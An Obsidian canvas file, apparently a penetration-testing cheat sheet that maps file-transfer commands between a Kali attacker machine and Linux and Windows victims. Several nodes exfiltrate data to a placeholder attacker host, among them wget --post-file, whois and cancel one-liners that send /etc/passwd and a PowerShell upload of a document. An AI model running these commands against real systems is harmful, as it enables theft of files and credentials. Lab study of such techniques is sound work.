{
	"nodes":[
		{"type":"group","id":"c2413251d995a6fc","x":-1600,"y":1000,"width":5440,"height":3600,"label":"Transfer files to ATTACKER"},
		{"type":"group","id":"8efeb60864543ccb","x":-1420,"y":1480,"width":2540,"height":3075,"color":"1","label":"Kali Attacker "},
		{"type":"group","id":"f41c157d56eb1d97","x":1400,"y":2920,"width":2320,"height":1635,"color":"5","label":"Windows Victim"},
		{"type":"group","id":"4c42a929ddddf209","x":1400,"y":1320,"width":2320,"height":1480,"color":"4","label":"Linux Victim"},
		{"type":"text","text":"TFTP","id":"0df34b2ce7779a14","x":-888,"y":2583,"width":162,"height":60},
		{"type":"text","text":"Web","id":"a5657be0052b21b4","x":-882,"y":2914,"width":162,"height":60},
		{"type":"text","text":"FTP","id":"e7518bfe4e3d2a04","x":-888,"y":2163,"width":162,"height":60},
		{"type":"text","text":"SSH","id":"de812d21785b5051","x":-888,"y":1923,"width":162,"height":60},
		{"type":"text","text":"SCP","id":"d19eaf65d255b3e9","x":-876,"y":1783,"width":150,"height":60},
		{"type":"text","text":"Download file(s)","id":"35f4a7cf15b3565e","x":-1360,"y":2911,"width":160,"height":60},
		{"type":"text","text":"RDP","id":"dbaaa78274848b06","x":-894,"y":4215,"width":250,"height":60},
		{"type":"text","text":"netcat","id":"e5712d4396ae46c0","x":-882,"y":3745,"width":250,"height":60},
		{"type":"text","text":"Socat","id":"bb61437274480bce","x":-882,"y":3865,"width":250,"height":60},
		{"type":"text","text":"SMB","id":"b597428b8f16e360","x":-882,"y":4005,"width":250,"height":60},
		{"type":"text","text":"Evil-winRM","id":"27670e51f3e77954","x":-882,"y":4433,"width":250,"height":60},
		{"type":"text","text":"FTP","id":"1b428995d89bac51","x":3080,"y":3370,"width":156,"height":60},
		{"type":"text","text":"```bash\nftp <IP-ATTACKER>\n```","id":"c74e4313eb6bdacf","x":2694,"y":3368,"width":258,"height":60},
		{"type":"text","text":"Multiple files","id":"3eaa0c2c8318667c","x":2434,"y":3259,"width":160,"height":60},
		{"type":"text","text":"Single file","id":"7c31c9ead21cc3be","x":2434,"y":3368,"width":160,"height":60},
		{"type":"text","text":"```cmd\nopen <IP-ATTACKER> \n<USERNAME>\n<PASSWORD>\nbinary\nput file.exe\ndisconnect\nquit\n```","id":"0a7dd691df937c39","x":2040,"y":2980,"width":250,"height":260},
		{"type":"text","text":"```bash\nmput <FILE-*>\n```","id":"9e67a4eb98d2ac33","x":1740,"y":3259,"width":280,"height":60},
		{"type":"text","text":"```cmd\nftp -i -s:ftp.txt\n```","id":"81751f83cae24cbb","x":1770,"y":3080,"width":250,"height":60},
		{"type":"text","text":"```bash\nput <FILE-NAME>\n```","id":"669a918965c11e35","x":1740,"y":3368,"width":280,"height":60},
		{"type":"text","text":"TFTP","id":"f3ad80bcfe018a40","x":3080,"y":3594,"width":156,"height":60},
		{"type":"text","text":"```cmd\ntftp -i <IP-ATTACKER> put <FILENAME>\n```","id":"7e49eb10ca6f5757","x":2430,"y":3594,"width":522,"height":60},
		{"type":"text","text":"Copy file to root of webservice","id":"66a989b2ce7955a1","x":2053,"y":3739,"width":474,"height":61},
		{"type":"text","text":"Host file on VICTIM","id":"0e6da9744b61366c","x":2704,"y":3740,"width":250,"height":60},
		{"type":"text","text":"```powershell\npowershell (New-Object System.Net.WebClient).UploadFile('http://10.11.0.4/upload.php', 'important.docx')\n```","id":"1dd46bc058c62b3c","x":1656,"y":3841,"width":860,"height":100},
		{"type":"text","text":"Upload","id":"91e05c95557b3633","x":2829,"y":3861,"width":125,"height":60},
		{"type":"text","text":"Web","id":"e81977e44c9be781","x":3080,"y":3831,"width":156,"height":60},
		{"type":"text","text":"Powershell","id":"5366fb544222be19","x":2551,"y":3861,"width":183,"height":60},
		{"type":"text","text":"","id":"321f3a413498b2ce","x":1440,"y":4113,"width":60,"height":60,"color":"4"},
		{"type":"text","text":"```cmd\nnc -nlvp 4444 < outgoing.txt\n```","id":"4f05cb4216e3f2ff","x":1740,"y":4013,"width":680,"height":50},
		{"type":"text","text":"```cmd\nsocat -u FILE:test.txt TCP:127.0.0.1:9876\n```","id":"01242ee3bd640059","x":1740,"y":4118,"width":680,"height":60},
		{"type":"text","text":"Netcat","id":"2beb0f379f15cf91","x":3080,"y":4010,"width":156,"height":60},
		{"type":"text","text":"Socat","id":"c69ddc1b9670e9d5","x":3080,"y":4120,"width":156,"height":60},
		{"type":"text","text":"","id":"a84cf981923b7f68","x":1440,"y":3739,"width":60,"height":61,"color":"#d8be13"},
		{"type":"text","text":"","id":"9064238ac18087ba","x":1440,"y":3594,"width":60,"height":60,"color":"#3dfffc"},
		{"type":"text","text":"","id":"319bed429aa52a55","x":1440,"y":3259,"width":60,"height":60,"color":"#813dff"},
		{"type":"text","text":"Just copy via the GUI","id":"e654e7d64ef63509","x":2180,"y":4358,"width":240,"height":60},
		{"type":"text","text":"","id":"206d8a6ac4824b5e","x":1440,"y":4233,"width":60,"height":60,"color":"#00ccff"},
		{"type":"text","text":"","id":"04b72fc063be29c4","x":1440,"y":4353,"width":60,"height":60,"color":"#e100ff"},
		{"type":"text","text":"```cmd\ncopy C:\\users\\public\\music\\filename.txt \\\\0.0.0.0\\share\\filename.txt \n```","id":"5bf710169d6525f9","x":1740,"y":4238,"width":900,"height":60},
		{"type":"text","text":"SMB","id":"2ad3fca3d7ebf6d9","x":3080,"y":4240,"width":156,"height":60},
		{"type":"text","text":"RDP","id":"87cbabd65a20471d","x":3080,"y":4360,"width":156,"height":60},
		{"type":"text","text":"```bash\nsudo python3 -m python_ftp_server -d \"</home/kali/project/upload-directory\" -u \"user\" -p \"password\" --ip <IP-ATTACKER> --port 21\n```","id":"17b0029c99e27636","x":72,"y":2423,"width":780,"height":96},
		{"type":"text","text":"","id":"8209634c9d537ed4","x":974,"y":2583,"width":60,"height":60,"color":"#3dfffc"},
		{"type":"text","text":"","id":"053e7e8f3c315c09","x":1440,"y":4433,"width":60,"height":60,"color":"3"},
		{"type":"text","text":"","id":"11707e48c1e1a141","x":1442,"y":3841,"width":60,"height":100,"color":"#f0ff24"},
		{"type":"text","text":"","id":"971ac7a48bc9d48a","x":974,"y":3002,"width":60,"height":452,"color":"#f0ff24"},
		{"type":"text","text":"```bash\nxfreerdp /v:$ip /u:<username> /p:<password> /dynamic-resolution +clipboard /drive:share,/home/kali/project\n```","id":"4059fd2f11279a8b","x":-274,"y":4275,"width":1091,"height":60},
		{"type":"text","text":"","id":"943c0a1d0316a739","x":974,"y":3660,"width":60,"height":145,"color":"2"},
		{"type":"text","text":"","id":"9fc36171dc101cae","x":974,"y":3865,"width":60,"height":60,"color":"4"},
		{"type":"text","text":"","id":"99bfa859aa5eaaf0","x":974,"y":4008,"width":60,"height":60,"color":"#00ccff"},
		{"type":"text","text":"","id":"14f23e71f8aef871","x":974,"y":4150,"width":60,"height":185,"color":"#e100ff"},
		{"type":"text","text":"\n```bash\nsystemctl start pure-ftpd\n```\n","id":"c8cd070b275877d0","x":72,"y":2254,"width":609,"height":60},
		{"type":"text","text":"```bash\nsudo service vsftpd start\n```","id":"04b04eb552ce441d","x":72,"y":2343,"width":609,"height":60},
		{"type":"text","text":"","id":"da3be8f1fa1efbaa","x":1440,"y":4003,"width":60,"height":60,"color":"2"},
		{"type":"text","text":"Upload file(s)","id":"6f7a5c655bd1b965","x":3400,"y":3940,"width":220,"height":60},
		{"type":"text","text":"winRM","id":"664adbb7ea9bdbbc","x":3080,"y":4440,"width":156,"height":60},
		{"type":"text","text":"```php\n<?php\n$uploaddir = '/var/www/uploads/';\n$uploadfile = $uploaddir . $_FILES['file']['name'];\nmove_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)\n?>\n```","id":"d54377d7edd089e0","x":46,"y":3002,"width":706,"height":155},
		{"id":"35463c1471f7d024","type":"text","text":"```bash\nsudo python -m pyftpdlib 21\n```","x":99,"y":3474,"width":653,"height":60},
		{"type":"text","text":"```bash\npython SimpleHTTPServerWithUpload.py\n```","id":"3617fc4e04469b66","x":96,"y":3354,"width":656,"height":60},
		{"type":"text","text":"","id":"1ca60381a66b2f39","x":974,"y":4433,"width":60,"height":60,"color":"3"},
		{"type":"text","text":"```bash\ndownload filename.txt /home/kali/projects/filename.txt\n```","id":"93849ad34b5459f2","x":18,"y":4433,"width":659,"height":60},
		{"type":"text","text":"```bash\nget <FILE-NAME>\n```","id":"eb173489af0c76d1","x":462,"y":2073,"width":280,"height":60},
		{"type":"text","text":"```bash\nmget <FILE-*>\n```","id":"61a872e658dfe5c0","x":462,"y":2163,"width":280,"height":60},
		{"type":"text","text":"```bash\nscp user@VICTIM-IP:/path/to/remotefile.sh /Local/Target/Detination\n```","id":"0b103e4040e84c63","x":-148,"y":1783,"width":854,"height":60},
		{"type":"text","text":"```bash\naxel -a -n 20 -o filename.pdf http://www.domain.tld/directory/large-file.pdf\n```","id":"d6d94240af95f1fa","x":-154,"y":2736,"width":831,"height":60},
		{"type":"text","text":"","id":"7dd0c1a9782a1259","x":974,"y":2733,"width":60,"height":238,"color":"#d8be13"},
		{"type":"text","text":"","id":"0887979d73fc6e82","x":974,"y":1923,"width":60,"height":60,"color":"#ff00bb"},
		{"type":"text","text":"","id":"1f0cc683a5d4144e","x":974,"y":2073,"width":60,"height":446,"color":"#813dff"},
		{"type":"text","text":"","id":"e77cabc74a6b8e6b","x":974,"y":1783,"width":60,"height":60,"color":"#009e1a"},
		{"type":"text","text":"```bash\nsudo php -S 0.0.0.0:80\n```","id":"7cc43aa399754661","x":216,"y":3204,"width":367,"height":60},
		{"type":"text","text":"```bash\nsudo systemctl start ssh\n```","id":"020fb08309842c83","x":-147,"y":1923,"width":609,"height":60},
		{"type":"text","text":"```bash\nrdesktop $ip -u <username> -p <password> -r disk:tmp=$(pwd)\n```","id":"c30a20baf7474793","x":-274,"y":4155,"width":722,"height":60},
		{"type":"text","text":"Single file","id":"52c73efa9250685c","x":256,"y":2073,"width":160,"height":60},
		{"type":"text","text":"Multiple files","id":"310fc0d025eaa781","x":256,"y":2163,"width":160,"height":60},
		{"type":"text","text":"```bash\nnc -nv 10.11.0.22 4444 > /home/kali/project/outgoing.txt\n```","id":"76744c6f93744040","x":-462,"y":3750,"width":837,"height":50},
		{"type":"text","text":"```bash\nnc -nlvp 1234\n```","id":"7a348eb82fc2e891","x":-462,"y":3660,"width":837,"height":50},
		{"type":"text","text":"```bash\nwget http://<IP-ATTACKER>/<FILE> \n```","id":"80d99aedeb039daa","x":-154,"y":2824,"width":493,"height":60},
		{"type":"text","text":"```bash\ncurl http://<IP-ATTACKER>/<FILE> -o <file>\n```","id":"59170f3ea19b642f","x":-154,"y":2911,"width":493,"height":60},
		{"type":"text","text":"```bash\nsudo impacket-smbserver share $(pwd) -smb2support\n```","id":"41ba20af7431563f","x":-224,"y":4005,"width":567,"height":60},
		{"type":"text","text":"```bash \nsudo atftpd --daemon --port 69 /tftp\n```","id":"81e94ba50e067092","x":-160,"y":2583,"width":489,"height":60},
		{"type":"text","text":"```bash\nsocat -u TCP-LISTEN:9876,reuseaddr OPEN:out.txt,creat && cat out.txt\n```","id":"bb057ca10ad0dd92","x":-462,"y":3865,"width":722,"height":60},
		{"type":"text","text":"pure FTP","id":"2bd6bbbe250c523b","x":-106,"y":2254,"width":140,"height":60},
		{"type":"text","text":"```bash\nftp <IP-ATTACKER>\n```","id":"abe18e07d0219c92","x":-89,"y":2073,"width":258,"height":60},
		{"type":"text","text":"VSFTPD","id":"e027d50cd519e8b9","x":-106,"y":2343,"width":140,"height":60},
		{"type":"text","text":"Python","id":"16a8d9f4d6ce0925","x":-106,"y":2441,"width":140,"height":60},
		{"type":"text","text":"PHP","id":"77071a338b4ae4d0","x":-171,"y":3204,"width":140,"height":60},
		{"type":"text","text":"Python","id":"4f0282692097be94","x":-159,"y":3354,"width":140,"height":60},
		{"type":"text","text":"```bash\nevil-winrm\n```","id":"732d7c2c11f71f65","x":-462,"y":4433,"width":419,"height":60},
		{"type":"text","text":"Hosting  a upload service","id":"519fb02a7d927135","x":-540,"y":2343,"width":277,"height":60},
		{"type":"text","text":"Downloading","id":"59570f94b9250d2e","x":-540,"y":2073,"width":277,"height":60},
		{"type":"text","text":"Downloading","id":"a77417db335770b4","x":-540,"y":2824,"width":277,"height":60},
		{"type":"text","text":"Hosting  a upload service","id":"de583cf5c784e101","x":-540,"y":3202,"width":277,"height":64},
		{"type":"text","text":"rdesktop","id":"0581355edea7e0eb","x":-512,"y":4155,"width":140,"height":60},
		{"type":"text","text":"xfreerdp","id":"2ecea737e06d4576","x":-511,"y":4275,"width":140,"height":60},
		{"type":"text","text":"impacket","id":"7182ca8d7591ad6f","x":-462,"y":4005,"width":140,"height":60},
		{"type":"text","text":"\n```bash\nruby -rwebrick -e \"WEBrick::HTTPServer.new(:Port => 8080, :DocumentRoot => Dir.pwd).start\"\n```\n","id":"9874eb1622fe61eb","x":1604,"y":2293,"width":922,"height":58},
		{"type":"text","text":"```bash\nwget --post-file=/etc/passwd <IP-ATTACKER:1234>\n```","id":"d23beb5101c5b310","x":2129,"y":2380,"width":489,"height":50},
		{"type":"text","text":"SSH","id":"c3fc32194eed48db","x":2960,"y":1360,"width":156,"height":60},
		{"type":"text","text":"SCP","id":"162af4fbd5ef72dd","x":2960,"y":1460,"width":156,"height":60},
		{"type":"text","text":"FTP","id":"b43cdd2457a7e306","x":2960,"y":1640,"width":156,"height":60},
		{"type":"text","text":"Upload file(s)","id":"ec15a9d60e148a70","x":3400,"y":2000,"width":220,"height":60},
		{"type":"text","text":"Web","id":"d45048da5b52c0e8","x":2960,"y":2071,"width":156,"height":60},
		{"type":"text","text":"wget","id":"59359e3a5c3d4535","x":2960,"y":2380,"width":156,"height":50},
		{"type":"text","text":"Multiple files","id":"ceca3ee191cc6b7b","x":2057,"y":1590,"width":160,"height":60},
		{"type":"text","text":"Single file","id":"5bdd930adaab59f8","x":2057,"y":1670,"width":160,"height":60},
		{"type":"text","text":"```bash\nftp <IP-ATTACKER>\n```","id":"5f3d917251ff518b","x":2364,"y":1640,"width":258,"height":60},
		{"type":"text","text":"Host a service","id":"03ef73ab057c6aa8","x":2364,"y":1780,"width":250,"height":60},
		{"type":"text","text":"Host file on VICTIM running webservice","id":"cf5e7178a6c07781","x":2404,"y":1907,"width":406,"height":60},
		{"type":"text","text":"Python","id":"1da1bf62207b73bf","x":2670,"y":2071,"width":140,"height":60},
		{"type":"text","text":"Ruby","id":"1423974a6d1ba0d1","x":2670,"y":2262,"width":140,"height":60},
		{"type":"text","text":"\n```bash\nruby -run -e httpd . -p 9000\n```","id":"b13418b4cc74fb85","x":2085,"y":2206,"width":441,"height":58},
		{"type":"text","text":"```bash\nmput <FILE-*>\n```","id":"f54f7348f66ffc4e","x":1604,"y":1590,"width":280,"height":60},
		{"type":"text","text":"```bash\nput <FILE-NAME>\n```","id":"3076e110475c68ec","x":1604,"y":1670,"width":280,"height":60},
		{"type":"text","text":"Copy file to root of FTP service","id":"72949c86b6c72209","x":1604,"y":1779,"width":474,"height":61},
		{"type":"text","text":"```bash\nsudo systemctl start ssh\n```","id":"98870cc09701b962","x":1849,"y":1360,"width":609,"height":60},
		{"type":"text","text":"Copy file to root of webservice","id":"287373da86ddd7bd","x":1864,"y":1907,"width":442,"height":61},
		{"type":"text","text":"","id":"f26fedc63ca81598","x":1430,"y":1360,"width":60,"height":60,"color":"#009e1a"},
		{"type":"text","text":"","id":"f0f11e4dd6631dc6","x":1430,"y":1460,"width":60,"height":60,"color":"#ff00bb"},
		{"type":"text","text":"```bash\nscp local_file.txt USER@ATTACKER-IP:/tmp/remote_file.txt\n```","id":"4eeb888b123623cf","x":1604,"y":1460,"width":854,"height":60},
		{"type":"text","text":"","id":"1bf9e55a732d0cd2","x":1430,"y":1590,"width":60,"height":250,"color":"#813dff"},
		{"type":"text","text":"Python","id":"dda50923a07f19b6","x":2404,"y":2008,"width":125,"height":60},
		{"type":"text","text":"\n```bash\nsudo python -m SimpleHTTPServer 8080\n```\n","id":"8dd532d66174f834","x":1864,"y":2010,"width":441,"height":58},
		{"type":"text","text":"\n```bash\nsudo python3 -m http.server 8080\n```\n","id":"8c2a93016be5b298","x":1864,"y":2101,"width":441,"height":58},
		{"type":"text","text":"Python3","id":"94a0e4970e720140","x":2404,"y":2101,"width":125,"height":60},
		{"type":"text","text":"```bash\ncancel -u \"$(cat /etc/passwd)\" -h  <IP-ATTACKER:1234>\n```","id":"b26f0d06c675a891","x":2129,"y":2534,"width":489,"height":50},
		{"type":"text","text":"```bash\nnc -nlvp 4444 < outgoing.txt\n```","id":"17dcfbccec1e4758","x":2129,"y":2620,"width":493,"height":50},
		{"type":"text","text":"netcat","id":"41096355fc79982d","x":2962,"y":2620,"width":156,"height":50},
		{"type":"text","text":"Socat","id":"e6080f5fcb0e0aa1","x":2962,"y":2700,"width":156,"height":50},
		{"type":"text","text":"```bash\nwhois -h <IP-ATTACKER> - p<1234> `cat /etc/passwd`\n```","id":"ddee697d53d248fa","x":2129,"y":2456,"width":489,"height":50},
		{"type":"text","text":"whois","id":"5802a5970cdb4414","x":2962,"y":2456,"width":156,"height":50},
		{"type":"text","text":"cancel","id":"71895cd69bc8c284","x":2962,"y":2533,"width":156,"height":50},
		{"type":"text","text":"","id":"ade906f9fa3719d4","x":1430,"y":1907,"width":60,"height":444,"color":"#d8be13"},
		{"type":"text","text":"","id":"b92ed687ac196517","x":1432,"y":2380,"width":60,"height":290,"color":"2"},
		{"type":"text","text":"```bash\nsocat -u FILE:test.txt TCP:127.0.0.1:9876\n```","id":"2ff0f3e439b8dd09","x":2137,"y":2700,"width":493,"height":60},
		{"type":"text","text":"","id":"c13ccadb8997ef05","x":1432,"y":2700,"width":60,"height":60,"color":"4"}
	],
	"edges":[
		{"id":"fbb77b8cdbdc9c0d","fromNode":"35f4a7cf15b3565e","fromSide":"right","toNode":"e7518bfe4e3d2a04","toSide":"left"},
		{"id":"fcbf07ec54779a6f","fromNode":"35f4a7cf15b3565e","fromSide":"right","toNode":"a5657be0052b21b4","toSide":"left"},
		{"id":"78c177a4e17e3da0","fromNode":"35f4a7cf15b3565e","fromSide":"right","toNode":"b597428b8f16e360","toSide":"left"},
		{"id":"c9ed8c98a9f9cd7c","fromNode":"de583cf5c784e101","fromSide":"right","toNode":"77071a338b4ae4d0","toSide":"left"},
		{"id":"b91afa9f51c4cdd2","fromNode":"b597428b8f16e360","fromSide":"right","toNode":"7182ca8d7591ad6f","toSide":"left"},
		{"id":"5bfd2e9803c16bb1","fromNode":"7182ca8d7591ad6f","fromSide":"right","toNode":"41ba20af7431563f","toSide":"left"},
		{"id":"ae2e1e8146ee7f2b","fromNode":"77071a338b4ae4d0","fromSide":"right","toNode":"7cc43aa399754661","toSide":"left"},
		{"id":"97279056f8157603","fromNode":"35f4a7cf15b3565e","fromSide":"right","toNode":"e5712d4396ae46c0","toSide":"left"},
		{"id":"ce9a32f5d5b02606","fromNode":"e5712d4396ae46c0","fromSide":"right","toNode":"76744c6f93744040","toSide":"left"},
		{"id":"3e944cd077abe74c","fromNode":"7cc43aa399754661","fromSide":"right","toNode":"971ac7a48bc9d48a","toSide":"left"},
		{"id":"555a01160ee57a59","fromNode":"ec15a9d60e148a70","fromSide":"left","toNode":"b43cdd2457a7e306","toSide":"right"},
		{"id":"fcc549cfbee7f550","fromNode":"ec15a9d60e148a70","fromSide":"left","toNode":"d45048da5b52c0e8","toSide":"right"},
		{"id":"9a44997268df2927","fromNode":"ec15a9d60e148a70","fromSide":"left","toNode":"41096355fc79982d","toSide":"right"},
		{"id":"94a70fe5b2e8a501","fromNode":"6f7a5c655bd1b965","fromSide":"left","toNode":"1b428995d89bac51","toSide":"right"},
		{"id":"b23cc9d4ba0a358b","fromNode":"6f7a5c655bd1b965","fromSide":"left","toNode":"e81977e44c9be781","toSide":"right"},
		{"id":"91945b68df2c343b","fromNode":"6f7a5c655bd1b965","fromSide":"left","toNode":"2beb0f379f15cf91","toSide":"right"},
		{"id":"3637b4497fdd3063","fromNode":"87cbabd65a20471d","fromSide":"left","toNode":"e654e7d64ef63509","toSide":"right"},
		{"id":"bbe60e18cceddb3d","fromNode":"14f23e71f8aef871","fromSide":"right","toNode":"04b72fc063be29c4","toSide":"left","color":"#e100ff"},
		{"id":"b5083ffca6ea3566","fromNode":"a84cf981923b7f68","fromSide":"left","toNode":"7dd0c1a9782a1259","toSide":"right","color":"#d8be13"},
		{"id":"fe0e4522b14b9d40","fromNode":"ade906f9fa3719d4","fromSide":"left","toNode":"7dd0c1a9782a1259","toSide":"right","color":"#d8be13"},
		{"id":"9ac318ecb057e5c6","fromNode":"6f7a5c655bd1b965","fromSide":"left","toNode":"2ad3fca3d7ebf6d9","toSide":"right"},
		{"id":"737273cbfb38af62","fromNode":"6f7a5c655bd1b965","fromSide":"left","toNode":"87cbabd65a20471d","toSide":"right"},
		{"id":"d605070482ce80e0","fromNode":"2ad3fca3d7ebf6d9","fromSide":"left","toNode":"5bf710169d6525f9","toSide":"right"},
		{"id":"5c5ce08b989a2a41","fromNode":"5bf710169d6525f9","fromSide":"left","toNode":"206d8a6ac4824b5e","toSide":"right"},
		{"id":"606fd6b8dc8b4145","fromNode":"41ba20af7431563f","fromSide":"right","toNode":"99bfa859aa5eaaf0","toSide":"left"},
		{"id":"71f8237bd5ea08fc","fromNode":"206d8a6ac4824b5e","fromSide":"left","toNode":"99bfa859aa5eaaf0","toSide":"right","color":"#00ccff"},
		{"id":"4a97dde41300da34","fromNode":"e654e7d64ef63509","fromSide":"left","toNode":"04b72fc063be29c4","toSide":"right"},
		{"id":"00e482679c957cfd","fromNode":"76744c6f93744040","fromSide":"right","toNode":"943c0a1d0316a739","toSide":"left"},
		{"id":"e09740b5811f2461","fromNode":"da3be8f1fa1efbaa","fromSide":"left","toNode":"943c0a1d0316a739","toSide":"right","color":"2"},
		{"id":"574911bdc5942a6a","fromNode":"b92ed687ac196517","fromSide":"left","toNode":"943c0a1d0316a739","toSide":"right","color":"2"},
		{"id":"2ec842f4b75e3a52","fromNode":"2beb0f379f15cf91","fromSide":"left","toNode":"4f05cb4216e3f2ff","toSide":"right"},
		{"id":"f1f0687753284b2c","fromNode":"4f05cb4216e3f2ff","fromSide":"left","toNode":"da3be8f1fa1efbaa","toSide":"right"},
		{"id":"430672ec9b05228c","fromNode":"41096355fc79982d","fromSide":"left","toNode":"17dcfbccec1e4758","toSide":"right"},
		{"id":"8a896c499fa58b95","fromNode":"35f4a7cf15b3565e","fromSide":"right","toNode":"bb61437274480bce","toSide":"left"},
		{"id":"86b22e6c402c4a33","fromNode":"bb61437274480bce","fromSide":"right","toNode":"bb057ca10ad0dd92","toSide":"left"},
		{"id":"d872b01972d1240d","fromNode":"bb057ca10ad0dd92","fromSide":"right","toNode":"9fc36171dc101cae","toSide":"left"},
		{"id":"c258558ff55534bc","fromNode":"321f3a413498b2ce","fromSide":"left","toNode":"9fc36171dc101cae","toSide":"right","color":"4"},
		{"id":"c90b057b9efb950c","fromNode":"01242ee3bd640059","fromSide":"left","toNode":"321f3a413498b2ce","toSide":"right"},
		{"id":"bbfb9e054ab7ff60","fromNode":"c69ddc1b9670e9d5","fromSide":"left","toNode":"01242ee3bd640059","toSide":"right"},
		{"id":"3761f7f37883bb23","fromNode":"6f7a5c655bd1b965","fromSide":"left","toNode":"c69ddc1b9670e9d5","toSide":"right"},
		{"id":"17a2f91364915e49","fromNode":"35f4a7cf15b3565e","fromSide":"right","toNode":"de812d21785b5051","toSide":"left"},
		{"id":"25e6ccccf41b7e42","fromNode":"519fb02a7d927135","fromSide":"right","toNode":"2bd6bbbe250c523b","toSide":"left"},
		{"id":"43858a6311868ce1","fromNode":"2bd6bbbe250c523b","fromSide":"right","toNode":"c8cd070b275877d0","toSide":"left"},
		{"id":"6e8140a88c2e72b0","fromNode":"c8cd070b275877d0","fromSide":"right","toNode":"1f0cc683a5d4144e","toSide":"left"},
		{"id":"85dfb871b0d94439","fromNode":"1bf9e55a732d0cd2","fromSide":"left","toNode":"1f0cc683a5d4144e","toSide":"right","color":"#813dff"},
		{"id":"2a927686cd669a99","fromNode":"319bed429aa52a55","fromSide":"left","toNode":"1f0cc683a5d4144e","toSide":"right","color":"#813dff"},
		{"id":"33e5f5be632d266d","fromNode":"5f3d917251ff518b","fromSide":"left","toNode":"ceca3ee191cc6b7b","toSide":"right"},
		{"id":"ee5b5971cb455eba","fromNode":"5f3d917251ff518b","fromSide":"left","toNode":"5bdd930adaab59f8","toSide":"right"},
		{"id":"ff6cc8c51e8f9468","fromNode":"ceca3ee191cc6b7b","fromSide":"left","toNode":"f54f7348f66ffc4e","toSide":"right"},
		{"id":"3a799841a2fb2988","fromNode":"5bdd930adaab59f8","fromSide":"left","toNode":"3076e110475c68ec","toSide":"right"},
		{"id":"2780f51ddbf79095","fromNode":"3076e110475c68ec","fromSide":"left","toNode":"1bf9e55a732d0cd2","toSide":"right"},
		{"id":"f906df908c9c67e2","fromNode":"f54f7348f66ffc4e","fromSide":"left","toNode":"1bf9e55a732d0cd2","toSide":"right"},
		{"id":"e9e38d20c4214476","fromNode":"b43cdd2457a7e306","fromSide":"left","toNode":"5f3d917251ff518b","toSide":"right"},
		{"id":"2767f83496e3f037","fromNode":"17dcfbccec1e4758","fromSide":"left","toNode":"b92ed687ac196517","toSide":"right"},
		{"id":"4722a4cc33c6f32a","fromNode":"4eeb888b123623cf","fromSide":"left","toNode":"f0f11e4dd6631dc6","toSide":"right"},
		{"id":"7097c64f81dca066","fromNode":"ec15a9d60e148a70","fromSide":"left","toNode":"162af4fbd5ef72dd","toSide":"right"},
		{"id":"c142cfd00e130eba","fromNode":"162af4fbd5ef72dd","fromSide":"left","toNode":"4eeb888b123623cf","toSide":"right"},
		{"id":"a85e2235fc94321f","fromNode":"f0f11e4dd6631dc6","fromSide":"left","toNode":"0887979d73fc6e82","toSide":"right","color":"#ff00bb"},
		{"id":"26441e8e4a771f66","fromNode":"de812d21785b5051","fromSide":"right","toNode":"020fb08309842c83","toSide":"left"},
		{"id":"5da6e941a784bd0e","fromNode":"020fb08309842c83","fromSide":"right","toNode":"0887979d73fc6e82","toSide":"left"},
		{"id":"a865a035b2f9dd19","fromNode":"7c31c9ead21cc3be","fromSide":"left","toNode":"669a918965c11e35","toSide":"right"},
		{"id":"61c24f9e36b3050e","fromNode":"c74e4313eb6bdacf","fromSide":"left","toNode":"7c31c9ead21cc3be","toSide":"right"},
		{"id":"5169b8965f49dd25","fromNode":"1b428995d89bac51","fromSide":"left","toNode":"c74e4313eb6bdacf","toSide":"right"},
		{"id":"af015ecf7b7cb515","fromNode":"669a918965c11e35","fromSide":"left","toNode":"319bed429aa52a55","toSide":"right"},
		{"id":"1595b3ff03814a70","fromNode":"81751f83cae24cbb","fromSide":"left","toNode":"319bed429aa52a55","toSide":"right"},
		{"id":"16243d301e2b0c8e","fromNode":"0a7dd691df937c39","fromSide":"left","toNode":"81751f83cae24cbb","toSide":"right"},
		{"id":"cb27c52996a4f7e3","fromNode":"3eaa0c2c8318667c","fromSide":"left","toNode":"0a7dd691df937c39","toSide":"right"},
		{"id":"1bff59db041d7480","fromNode":"c74e4313eb6bdacf","fromSide":"left","toNode":"3eaa0c2c8318667c","toSide":"right"},
		{"id":"4810ecdbfcaaba45","fromNode":"3eaa0c2c8318667c","fromSide":"left","toNode":"9e67a4eb98d2ac33","toSide":"right"},
		{"id":"2d8a14dab4fd4beb","fromNode":"9e67a4eb98d2ac33","fromSide":"left","toNode":"319bed429aa52a55","toSide":"right"},
		{"id":"20f0ebd752730be6","fromNode":"ec15a9d60e148a70","fromSide":"left","toNode":"c3fc32194eed48db","toSide":"right"},
		{"id":"1dac01fecac18110","fromNode":"c3fc32194eed48db","fromSide":"left","toNode":"98870cc09701b962","toSide":"right"},
		{"id":"053d94031f6d6977","fromNode":"98870cc09701b962","fromSide":"left","toNode":"f26fedc63ca81598","toSide":"right"},
		{"id":"c28ee4bca2807ed9","fromNode":"35f4a7cf15b3565e","fromSide":"right","toNode":"d19eaf65d255b3e9","toSide":"left"},
		{"id":"ab03ea506acd0980","fromNode":"d19eaf65d255b3e9","fromSide":"right","toNode":"0b103e4040e84c63","toSide":"left"},
		{"id":"65d187fe19837d5e","fromNode":"0b103e4040e84c63","fromSide":"right","toNode":"e77cabc74a6b8e6b","toSide":"left"},
		{"id":"827ef759fc8e86fa","fromNode":"e77cabc74a6b8e6b","fromSide":"right","toNode":"f26fedc63ca81598","toSide":"left","color":"#009e1a"},
		{"id":"5f741bb1a1a71fad","fromNode":"6f7a5c655bd1b965","fromSide":"left","toNode":"664adbb7ea9bdbbc","toSide":"right"},
		{"id":"f6d35fb339fc6b50","fromNode":"664adbb7ea9bdbbc","fromSide":"left","toNode":"053e7e8f3c315c09","toSide":"right"},
		{"id":"f0e1d92630061260","fromNode":"1ca60381a66b2f39","fromSide":"right","toNode":"053e7e8f3c315c09","toSide":"left","color":"3"},
		{"id":"423123fa0bc26b3b","fromNode":"35f4a7cf15b3565e","fromSide":"right","toNode":"27670e51f3e77954","toSide":"left"},
		{"id":"e2b242aaaba1934b","fromNode":"27670e51f3e77954","fromSide":"right","toNode":"732d7c2c11f71f65","toSide":"left"},
		{"id":"e50e85d0db9b667d","fromNode":"732d7c2c11f71f65","fromSide":"right","toNode":"93849ad34b5459f2","toSide":"left"},
		{"id":"691b05f84721cc64","fromNode":"93849ad34b5459f2","fromSide":"right","toNode":"1ca60381a66b2f39","toSide":"left"},
		{"id":"50fbb47806d9af94","fromNode":"a5657be0052b21b4","fromSide":"right","toNode":"de583cf5c784e101","toSide":"left"},
